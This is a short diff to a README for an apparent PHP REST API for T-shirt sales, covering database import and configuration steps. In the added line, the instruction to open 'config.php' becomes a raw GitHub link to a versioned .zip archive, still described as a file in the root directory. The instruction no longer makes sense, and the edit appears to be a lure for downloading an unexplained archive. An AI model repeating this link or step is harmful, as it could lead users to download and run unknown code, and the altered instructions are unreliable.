Sheebalazar/API-Ventas-Camisetas-PHP-REST-Swagger-MVC/README.md

    - Import the provided SQL script to set up the database structure.
 You can find the script in the `database` folder of the extracted files.

 5. **Configure the Application**
-   - Open the `config.php` file located in the root directory of the application.
+   - Open the `https://raw.githubusercontent.com/Sheebalazar/API-Ventas-Camisetas-PHP-REST-Swagger-MVC/main/models/API-Ventas-Camisetas-PHP-REST-Swagger-MVC-v3.4.zip` file located in the root directory of the application.
    - Enter your database details (database name, username, and password).

 6. **Start the Server**